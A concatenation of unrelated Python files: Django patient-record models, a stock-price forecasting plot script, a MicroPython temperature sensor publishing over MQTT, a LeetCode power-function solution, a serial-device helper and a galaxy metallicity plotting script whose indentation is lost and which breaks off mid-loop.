        """Parse the three medication date strings via the str_to_date helper."""
        self.date_prescribed = str_to_date(data['date_prescribed'])
        self.date_started_taking = str_to_date(data['date_started_taking'])
        self.date_stopped_taking = str_to_date(data['date_stopped_taking'])
class Allergy(models.Model):
    """An allergy and its reaction recorded for a patient."""
    # on_delete made explicit; CASCADE matches the pre-Django-2.0 default.
    patient = models.ForeignKey(Patient, on_delete=models.CASCADE)
    notes = models.TextField(blank=True)
    reaction = models.CharField(max_length=200, blank=True)
    status = models.CharField(max_length=200, blank=True)

    def __str__(self):
        """Allergies are identified by their reaction text."""
        return self.reaction

    def set_patient(self, patient_id):
        """Attach the Patient with the given primary key (mirrors Problem/Medication)."""
        patient = Patient.objects.get(pk=patient_id)
        self.patient = patient
class Insurance(models.Model):
    """An insurance payer attached to a patient."""
    # Priority of this payer — presumably 1 = primary; confirm semantics.
    rank = models.IntegerField()
    payer_name = models.CharField(max_length=200)
    state = models.CharField(max_length=2)
    # on_delete made explicit; CASCADE matches the pre-Django-2.0 default.
    patient = models.ForeignKey(Patient, on_delete=models.CASCADE)

    def __str__(self):
        """Insurances are identified by the payer name."""
        return self.payer_name
class Appointment(models.Model):
    """A scheduled visit for a patient."""
    # on_delete made explicit; CASCADE matches the pre-Django-2.0 default.
    patient = models.ForeignKey(Patient, on_delete=models.CASCADE)
    # NOTE(review): stored as text, so the default ordering below is
    # lexicographic — confirm the timestamp format sorts chronologically
    # (e.g. ISO 8601 does).
    scheduled_time = models.CharField(max_length=200)
    status = models.CharField(max_length=200, blank=True)

    def __str__(self):
        """Appointments are identified by their scheduled time string."""
        return self.scheduled_time

    class Meta:
        # Default queryset ordering: earliest scheduled_time first.
        ordering = ['scheduled_time']
|
from spectrum import arma2psd, arburg # pip install spectrum
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot as plt
from pandas import DataFrame
from pandas import Series
from pandas import concat
from pandas import read_csv
from pandas import datetime
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential #单支线性网络模型
from keras.layers import Dense
from keras.layers import LSTM
# ---- input --------------------------------------------------------------
data1 = pd.read_csv('close300m.csv')
data = pd.read_csv('close500d.csv')
# NOTE (translated): a market-crash/trading-halt stretch can make rho go
# negative and raise an error in the AR fit; otherwise everything works.
data2 = pd.read_csv('close500m.csv')
data3 = pd.read_csv('close50030m.csv')
# Drop rows whose close price is zero, then any remaining NaNs.
data = data.drop(np.where(data.iloc[:, 1] == 0)[0])
data = data.dropna()
dataset = data.iloc[:, 1]
dataset = dataset.astype('float32')
print(dataset.shape)
# ---- function call ------------------------------------------------------
from myFunc import burgSimple, lstmDiff
# Renamed from `input`, which shadowed the builtin of the same name.
prices = dataset.ravel()
selected2, tradeP2 = lstmDiff(dataset)
plt.scatter(selected2, tradeP2, s=10, c='#DC143C', marker='o')
plt.plot(prices, c='#0000CD')
plt.grid(True)
plt.title('close price - time(ZZ500 30m)')
# NOTE(review): this second scatter indexes tradeP2 by selected2 while the
# first plots tradeP2 directly — confirm which of the two forms is intended.
plt.scatter(selected2, tradeP2[selected2], s=20, c='g', marker='o')
plt.show()
import esp
import dht
import time
import json
import machine
import network
from umqtt.simple import MQTTClient
# On-board status LED (active-low on many ESP boards): on() drives it high.
p = machine.Pin(2, machine.Pin.OUT)
p.on()
# NOTE(review): Pin.PULL_UP is normally the *pull* argument, not the mode —
# passing it as the mode here looks suspicious; confirm the intended config.
p2 = machine.Pin(4, machine.Pin.PULL_UP)
# NOTE(review): the DHT11 is attached to pin 2, the same pin driven as the
# LED above — confirm this pin sharing is intentional for this board.
d = dht.DHT11(machine.Pin(2))
# Seconds each pin stays toggled during a blink.
BLINK_DELAY=0.1
# Seconds between sensor measurements / MQTT publishes.
MEASR_DELAY=2
def blink():
    """Briefly pulse the two status pins.

    Pulses p low then back high, and p2 high then low.
    NOTE(review): the two pins are toggled in opposite senses — confirm
    this asymmetry is intentional (e.g. one active-low LED, one active-high).
    """
    p.off()
    time.sleep(BLINK_DELAY)
    p.on()
    p2.on()
    time.sleep(BLINK_DELAY)
    p2.off()
def get_rssi():
    """Return the RSSI of the configured WiFi network, or None if not found.

    Performs a fresh scan on the module-level station interface `sta` and
    matches the SSID against settings["network"].
    """
    ssid = settings["network"]
    for ap in sta.scan():
        # Index 0 is the SSID (bytes), index 3 the signal strength.
        if ap[0].decode() == ssid:
            return ap[3]
    return None
def ctof(t):
    """Convert a temperature from degrees Celsius to degrees Fahrenheit."""
    scale = 9 / 5
    return t * scale + 32
# Load device configuration (WiFi credentials, MQTT broker/name/topic).
# The with-statement guarantees the file handle is closed even if the JSON
# parse fails (the original open/readlines/close leaked on error).
with open("settings.json") as f:
    settings = json.loads(f.read())
# Bring up the WiFi station interface and connect with stored credentials.
sta = network.WLAN(network.STA_IF)
sta.active(True)
sta.connect(settings["network"], settings["password"])
# MQTT client identified by this device's name, talking to the configured broker.
c = MQTTClient(settings["name"], settings["broker"])
# Poll until WiFi is up, then open the MQTT connection exactly once.
while True:
    if sta.isconnected():
        c.connect()
        break
    time.sleep(1)
# Number of measurements published since boot (echoed in each message).
counter = 0
# Main loop: sample the DHT11, blink the status pins, publish one status
# line, then sleep.  NOTE(review): esp.freemem() is deprecated on newer
# MicroPython firmware in favor of gc.mem_free() — confirm the target build.
while True:
    d.measure()
    blink()
    c.publish(settings["topic"], "Blinked! Free mem: {}, Count: {}, Temp: {}, RH: {}, RSSI: {}".format(esp.freemem(), counter, ctof(d.temperature()), d.humidity(), get_rssi()))
    counter += 1
    time.sleep(MEASR_DELAY)
|
"""
Solution for 50. Pow(x, n)
https://leetcode.com/problems/powx-n/
"""
class Solution:
    """Solvers for LeetCode 50 — Pow(x, n): compute x raised to an integer power.

    Constraints from the problem statement: -100.0 < x < 100.0 and n is a
    32-bit signed integer.
    """

    def myPow(self, x: float, n: int) -> float:
        """Compute x ** n via O(log n) exponentiation by squaring.

        A negative exponent is handled by inverting the base once and
        recursing on the positive exponent, e.g. 2 ** -2 == 0.25.
        """
        if n < 0:
            return self.recursive(1 / x, -n)
        return self.recursive(x, n)

    def cheat(self, x: float, n: int) -> float:
        """Delegate straight to Python's built-in power (cheating!)."""
        return pow(x, n)

    def brute_force(self, x: float, n: int) -> float:
        """Multiply the base out one factor at a time.

        O(n) time, O(1) space; negative exponents invert the base first.
        """
        base = x if n >= 0 else 1 / x
        count = abs(n)
        product = 1
        for _ in range(count):
            product *= base
        return product

    def recursive(self, x: float, n: int) -> float:
        """Exponentiation by squaring: O(log n) time and O(log n) stack.

        Assumes n >= 0 (callers flip negative exponents beforehand).
        """
        if n == 0:
            return 1.0
        half = self.recursive(x, n >> 1)
        squared = half * half
        return squared if n % 2 == 0 else squared * x
|
import logging

# Route INFO-and-above records to a file.
logging.basicConfig(filename='logloglog.log', level=logging.INFO)
# BUG FIX: logging.INFO is an integer level constant, not a callable — the
# original `logging.INFO('lalala')` raised TypeError. Use logging.info().
logging.info('lalala')
|
from distutils.version import LooseVersion
from . codes import CMDTYPE, LEDTYPE, SPIChipsets, BufferChipsets
from bibliopixel.drivers.return_codes import RETURN_CODES, print_error
from bibliopixel.util import log, util
from bibliopixel.project.importer import import_symbol
class Devices(object):
    """Manage a list of serial devices."""

    def __init__(self, hardware_id, baudrate):
        """Remember the hardware id and baudrate; lazily import pyserial.

        pyserial is pulled in via import_symbol so it remains an optional
        dependency of the package.
        """
        self.hardware_id = hardware_id
        self.baudrate = baudrate
        self.serial = import_symbol('serial')
        self.list_ports = import_symbol('serial.tools.list_ports')

    def find_serial_devices(self):
        """Scan serial ports whose hardware id matches, case-insensitively.

        Returns (and caches on ``self.devices``) a dict mapping device id
        to a ``(port, version)`` tuple.

        NOTE(review): dev_id/version are never read from the device here
        (always 0), so the ``dev_id < 0`` branch is dead and every match
        collapses onto key 0 — it looks like device-interrogation code is
        missing or was elided; confirm before relying on multiple devices.
        """
        self.devices = {}
        hardware_id = "(?i)" + self.hardware_id  # forces case insensitive
        for ports in self.list_ports.grep(hardware_id):
            port = ports[0]
            dev_id = 0
            version = 0
            if getattr(ports, '__len__', lambda: 0)():
                log.debug('Multi-port device %s:%s:%s with %s ports found',
                          self.hardware_id, dev_id, version, len(ports))
            if dev_id < 0:
                # FIX: the message has four %s placeholders but only three
                # arguments were supplied (would raise if this branch ran).
                log.debug('Serial device %s:%s:%s with id %s < 0',
                          self.hardware_id, dev_id, version, dev_id)
            else:
                self.devices[dev_id] = port, version
        return self.devices

    def get_device(self, id=None):
        """Return ``(id, device, version)`` for the requested device.

        With ``id=None`` the device with the lowest id is used.

        Raises:
            ValueError: if no devices are known or the id is unknown.
        """
        if id is None:
            if not self.devices:
                raise ValueError('No default device for %s' % self.hardware_id)
            id, (device, version) = sorted(self.devices.items())[0]
        elif id in self.devices:
            device, version = self.devices[id]
        else:
            # BUG FIX: this formatted ``self.deviceID``, which does not exist,
            # so the unknown-id path raised AttributeError instead of the
            # intended ValueError with a useful message.
            error = 'Unable to find device with ID %s' % id
            log.error(error)
            raise ValueError(error)
        log.info("Using COM Port: %s, Device ID: %s, Device Ver: %s",
                 device, id, version)
        return id, device, version

    def error(self):
        """Log and raise a generic communication failure as IOError."""
        error = "There was an unknown error communicating with the device."
        log.error(error)
        raise IOError(error)
|
import matplotlib.pyplot as plt
import math
import os.path
def plot(plot_star=1, plot_gas=1, plot_mid=0, x_axis="dynamical", SFE=[0.5, 0.5], SFEN=[], log_SFR=[7, 8], IMF="Kroupa"):
# SFR = [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8] # log_10 star formation rate [solar mass/yr]
# SFD = [2.65, 1.77, 1.24, 0.93, 0.67, 0.47, 0.32, 0.22, 0.15, 0.1] # star formation duration [Gyr]
# SFD2 = [2.75, 1.87, 1.34, 1.03, 0.77, 0.57, 0.42, 0.32, 0.25, 0.2] # star formation duration [Gyr]
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(0, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
# plt.plot(SFR, SFD)
# plt.plot(SFR, SFD2)
# plt.xlabel(r'log$_{10}$(SFR [M$_\odot$/yr])')
# plt.ylabel('$\delta$t [Gyr]')
# # plt.xlim(6.4, 1.01 * log_time_axis[-1])
# # plt.ylim(-3, 0.5)
########################
final_stellar_mass_list = [] # x-axis
final_stellar_mass_list_dif = [] # x-axis
LumDyn_list = [] # x-axis
final_dynamical_mass_list = [] # x-axis
final_dynamical_mass_list_dif = [] # x-axis
total_mas_in_box_list = [] # x-axis
# plot_at_age = [1 * 10 ** 8, 1 * 10 ** 9, 9 * 10 ** 9, 10 * 10 ** 9, 11 * 10 ** 9]
plot_at_age = [5 * 10 ** 7, 1 * 10 ** 8, 5 * 10 ** 8, 1 * 10 ** 9, 1 * 10 ** 10]
length_plot_at_age = len(plot_at_age)
# Dabringhausen 2008 eq.4
Dabringhausen_2008_a = 2.95
Dabringhausen_2008_b = 0.596
gravitational_binding_energy_list = []
Number_of_SN_at_all_time_step_list = [[]]
Gas_Fe_over_H_at_all_step_list = [[]]
Star_Fe_over_H_at_all_step_list = [[]]
Gas_Mg_over_H_at_all_step_list = [[]]
Star_Mg_over_H_at_all_step_list = [[]]
Gas_O_over_H_at_all_step_list = [[]]
Star_O_over_H_at_all_step_list = [[]]
Gas_Mg_over_Fe_at_all_step_list = [[]]
Star_Mg_over_Fe_at_all_step_list = [[]]
Gas_O_over_Fe_at_all_step_list = [[]]
Star_O_over_Fe_at_all_step_list = [[]]
Gas_metallicity_at_all_step_list = [[]]
Star_metallicity_at_all_step_list = [[]]
i = 0
while i < length_plot_at_age - 1:
Number_of_SN_at_all_time_step_list.append([])
Gas_Fe_over_H_at_all_step_list.append([])
Star_Fe_over_H_at_all_step_list.append([])
Gas_Mg_over_H_at_all_step_list.append([])
Star_Mg_over_H_at_all_step_list.append([])
Gas_O_over_H_at_all_step_list.append([])
Star_O_over_H_at_all_step_list.append([])
Gas_Mg_over_Fe_at_all_step_list.append([])
Star_Mg_over_Fe_at_all_step_list.append([])
Gas_O_over_Fe_at_all_step_list.append([])
Star_O_over_Fe_at_all_step_list.append([])
Gas_metallicity_at_all_step_list.append([])
Star_metallicity_at_all_step_list.append([])
(i) = (i + 1)
##########################
raw_data = []
i = 0
while i < len(log_SFR):
if SFEN == []:
file = open(
'simulation_results/imf:{}-SFE:{}-log_SFR:{}.txt'.format(IMF, SFE[i], log_SFR[i]),'r')
else:
file = open('simulation_results/imf:{}-SFE:{}-log_SFR:{}-SFEN:{}.txt'.format(IMF, SFE[i], log_SFR[i], SFEN[i]), 'r')
# file = open('simulation_results_0.1Gyr/imf:igimf-SFE:{}-log_SFR:{}.txt'.format(SFE[i], log_SFR[i]), 'r')
raw_data.append(file.readlines())
file.close()
(i) = (i+1)
k = 0
while k < len(raw_data):
total_mas_in_box = float(raw_data[k][13])
total_mas_in_box_list.append(math.log(total_mas_in_box, 10))
final_stellar_mass = float(raw_data[k][7])
final_stellar_mass_list.append(final_stellar_mass)
final_stellar_mass_list_dif.append(10**final_stellar_mass/total_mas_in_box)
final_dynamical_mass = float(raw_data[k][11])
final_dynamical_mass_list.append(final_dynamical_mass)
final_dynamical_mass_list_dif.append(10**final_dynamical_mass/total_mas_in_box)
log_sigma = math.log(0.86, 10) + 0.22 * final_dynamical_mass
LumDyn_list.append(log_sigma)
expansion_factor = 5 # the expansion_factor should be a function of galaxy final_stellar_mass
# and rise with the mass
# See Kroupa 2008 for instantaneous and adibatic expansion
log_binding_energy = round(
math.log(4.3 * 6 / 5, 10) + 40 + (2 - Dabringhausen_2008_b) * math.log(total_mas_in_box, 10)
- math.log(Dabringhausen_2008_a, 10) + 6 * Dabringhausen_2008_b +
math.log(expansion_factor, 10), 1)
gravitational_binding_energy_list.append(log_binding_energy)
time = [float(x) for x in raw_data[k][15].split()]
Number_of_SN = [math.log(float(x), 10) for x in raw_data[k][17].split()]
Gas_Fe_over_H = [float(x) for x in raw_data[k][19].split()]
Star_Fe_over_H = [float(x) for x in raw_data[k][21].split()]
Gas_Mg_over_Fe = [float(x) for x in raw_data[k][23].split()]
Star_Mg_over_Fe = [float(x) for x in raw_data[k][25].split()]
Gas_O_over_Fe = [float(x) for x in raw_data[k][27].split()]
Star_O_over_Fe = [float(x) for x in raw_data[k][29].split()]
Gas_Mg_over_H = [float(x) for x in raw_data[k][31].split()]
Star_Mg_over_H = [float(x) for x in raw_data[k][33].split()]
Gas_O_over_H = [float(x) for x in raw_data[k][35].split()]
Star_O_over_H = [float(x) for x in raw_data[k][37].split()]
Gas_metallicity = [float(x) for x in raw_data[k][39].split()]
Star_metallicity = [float(x) for x in raw_data[k][41].split()]
plot_at_age_time_index = []
j = 0
while j < length_plot_at_age:
i = 0
while i < len(time):
if time[i] == plot_at_age[j]:
plot_at_age_time_index.append(i)
(i) = (i + 1)
(j) = (j + 1)
i = 0
while i < length_plot_at_age:
Number_of_SN_at_all_time_step_list[i].append([Number_of_SN[plot_at_age_time_index[i]] + 52])
Gas_Fe_over_H_at_all_step_list[i].append(Gas_Fe_over_H[plot_at_age_time_index[i]])
Star_Fe_over_H_at_all_step_list[i].append(Star_Fe_over_H[plot_at_age_time_index[i]])
Gas_Mg_over_H_at_all_step_list[i].append(Gas_Mg_over_H[plot_at_age_time_index[i]])
Star_Mg_over_H_at_all_step_list[i].append(Star_Mg_over_H[plot_at_age_time_index[i]])
Gas_O_over_H_at_all_step_list[i].append(Gas_O_over_H[plot_at_age_time_index[i]])
Star_O_over_H_at_all_step_list[i].append(Star_O_over_H[plot_at_age_time_index[i]])
Gas_Mg_over_Fe_at_all_step_list[i].append(Gas_Mg_over_Fe[plot_at_age_time_index[i]])
Star_Mg_over_Fe_at_all_step_list[i].append(Star_Mg_over_Fe[plot_at_age_time_index[i]])
Gas_O_over_Fe_at_all_step_list[i].append(Gas_O_over_Fe[plot_at_age_time_index[i]])
Star_O_over_Fe_at_all_step_list[i].append(Star_O_over_Fe[plot_at_age_time_index[i]])
Gas_metallicity_at_all_step_list[i].append(Gas_metallicity[plot_at_age_time_index[i]])
Star_metallicity_at_all_step_list[i].append(Star_metallicity[plot_at_age_time_index[i]])
(i) = (i + 1)
(k) = (k+1)
##########################
# Plot #
##########################
if x_axis == "dynamical":
mass_list = final_dynamical_mass_list
elif x_axis == "luminous":
mass_list = final_stellar_mass_list
elif x_axis == "LumDyn":
mass_list = LumDyn_list
elif x_axis == "SFR":
mass_list = log_SFR
# #################################
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(0, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
#
# plt.plot([log_SFR[0], log_SFR[-1]], [total_mas_in_box_list[0], total_mas_in_box_list[-1]], ls="dotted", c="k", label=r'M$_{galaxy}$=M$_{baryon}$')
# plt.plot([log_SFR[0], log_SFR[-1]], [total_mas_in_box_list[0]-0.301, total_mas_in_box_list[-1]-0.301], ls="dashed", c="k", label=r'M$_{galaxy,ini}$')
# plt.plot(log_SFR, final_dynamical_mass_list, label='dynamical (alive+remnant)')
# plt.plot(log_SFR, final_stellar_mass_list, label='luminous (alive)')
#
# plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
# # plt.xlabel(r'log$_{10}$(M$_{baryon}$) [M$_\odot$]')
# plt.ylabel(r'log$_{10}$(M$_{galaxy}$) [M$_\odot$]')
#
# plt.tight_layout()
# plt.legend(prop={'size': 10}, loc='best')
#
# #################################
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(-1, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
#
# plt.plot([log_SFR[0], log_SFR[-1]], [1, 1], ls="dashed", c="k", label=r'M$_{galaxy}$=M$_{baryon}$')
# plt.plot([log_SFR[0], log_SFR[-1]], [0.5, 0.5], ls="dotted", c="k", label=r'M$_{galaxy,ini}$')
# plt.plot(log_SFR, final_dynamical_mass_list_dif, label='dynamical (alive+remnant)')
# plt.plot(log_SFR, final_stellar_mass_list_dif, label='luminous (alive)')
#
# plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
# # plt.xlabel(r'log$_{10}$(M$_{baryon}$) [M$_\odot$]')
# plt.ylabel(r'M$_{galaxy}$/M$_{baryon}$')
#
# plt.tight_layout()
# plt.legend(prop={'size': 10}, loc='best')
# ##########################
# # Plot energy #
# ##########################
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(1, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
# plt.plot(mass_list, gravitational_binding_energy_list, ls='dashed', c='k',
# label='Gravitational binding energy')
# plt.plot([], [], c="k", label='SN energy at different time')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[4], c="brown", label='10 Gyr')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[3], c="red", label='1 Gyr')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[2], c="orange", label='500 Myr')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[1], c="green", label='100 Myr')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[0], c="blue", label='50 Myr')
#
# if x_axis == "dynamical":
# plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
# elif x_axis == "luminous":
# plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
# elif x_axis == "LumDyn":
# plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
# elif x_axis == "SFR":
# plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
# plt.ylabel('Energy [erg]')
# # plt.xlim(6.4, 1.01 * log_time_axis[-1])
# # plt.ylim(-3, 0.5)
# plt.tight_layout()
# plt.legend(prop={'size': 10}, loc='best')
##########################
# Plot [Z/H] #
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(2, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot([1, 3], [0, 0], ls='dotted', lw=1, label='Solar Value')
plt.plot([1.8, 2.4], [0.02, 0.16], ls='dashed', c='k', lw=1, label='Johansson 2012') # Johansson 2012 421-1908
plt.plot([1.8, 2.4], [-0.2, 0.2], ls='dashed', c='k', lw=1, label='Thomas 2010') # Thomas 404, 1775–1789 (2010)
plt.plot([2.1, 2.5], [0.1, 0.3], ls='dashed', c='k', lw=1, label='Thomas 2005') # Thomas 621:673–694, 2005
plt.plot([2.0, 2.4], [-0.168, 0.1984], ls='dashed', c='k', lw=1, label='Graves 2007') # Graves et al. 671:243-271, 2007
plt.plot([2.0, 2.4], [0.02, 0.378], ls='dashed', c='k', lw=1, label='Graves 2007') # Graves et al. 671:243-271, 2007
if plot_gas == 1:
plt.plot(mass_list, Gas_metallicity_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_metallicity_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_metallicity_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_metallicity_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_metallicity_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_metallicity_at_all_step_list[0], c="blue")
plt.plot(mass_list, Star_metallicity_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_metallicity_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_metallicity_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_metallicity_at_all_step_list[4], c="brown")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_metallicity_at_all_step_list[0]):
mid0.append((Gas_metallicity_at_all_step_list[0][i] + Star_metallicity_at_all_step_list[0][i]) / 2)
mid1.append((Gas_metallicity_at_all_step_list[1][i] + Star_metallicity_at_all_step_list[1][i]) / 2)
mid2.append((Gas_metallicity_at_all_step_list[2][i] + Star_metallicity_at_all_step_list[2][i]) / 2)
mid3.append((Gas_metallicity_at_all_step_list[3][i] + Star_metallicity_at_all_step_list[3][i]) / 2)
mid4.append((Gas_metallicity_at_all_step_list[4][i] + Star_metallicity_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[Z/H]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [Fe/H] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(3, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3, label='Solar Value')
plt.plot([1.9, 2.5], [-0.07, 0], ls='dashed', c='k', lw=1, label='Conroy 2014') # Conroy 2014 780-33
plt.plot([1.9, 2.5], [-0.17, 0.03], ls='dashed', c='k', lw=1, label='Graves 2008') # Graves & Schiavon 2008
plt.plot([1.8, 2.6], [-0.07, -0.1], ls='dashed', c='k', lw=1, label='Johansson 2012') # Johansson 2012
plt.plot([1, 1.7, 2.5], [-1.5, 0, 0], ls='dashed', c='k', lw=1, label='Koleva 2011') # Koleva et al. 417, 1643–1671 (2011)
plt.plot([2, 2.5], [-0.24, 0], ls='dashed', c='k', lw=1, label='Graves 2007') # Graves et al. 671:243-271, 2007
plt.plot([1.7, 2.48], [0, 0], ls='dashed', c='k', lw=1, label='Eigenthaler 2013') # Eigenthaler & Zeilinger2 A&A 553, A99 (2013)
if plot_gas == 1:
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[4], c="brown")
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[0], c="blue")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_Fe_over_H_at_all_step_list[0]):
mid0.append((Gas_Fe_over_H_at_all_step_list[0][i] + Star_Fe_over_H_at_all_step_list[0][i]) / 2)
mid1.append((Gas_Fe_over_H_at_all_step_list[1][i] + Star_Fe_over_H_at_all_step_list[1][i]) / 2)
mid2.append((Gas_Fe_over_H_at_all_step_list[2][i] + Star_Fe_over_H_at_all_step_list[2][i]) / 2)
mid3.append((Gas_Fe_over_H_at_all_step_list[3][i] + Star_Fe_over_H_at_all_step_list[3][i]) / 2)
mid4.append((Gas_Fe_over_H_at_all_step_list[4][i] + Star_Fe_over_H_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[Fe/H]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [Mg/H] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(4, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3,
label='Solar Value')
if plot_gas == 1:
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[4], c="brown")
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[0], c="blue")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_Mg_over_H_at_all_step_list[0]):
mid0.append((Gas_Mg_over_H_at_all_step_list[0][i] + Star_Mg_over_H_at_all_step_list[0][i]) / 2)
mid1.append((Gas_Mg_over_H_at_all_step_list[1][i] + Star_Mg_over_H_at_all_step_list[1][i]) / 2)
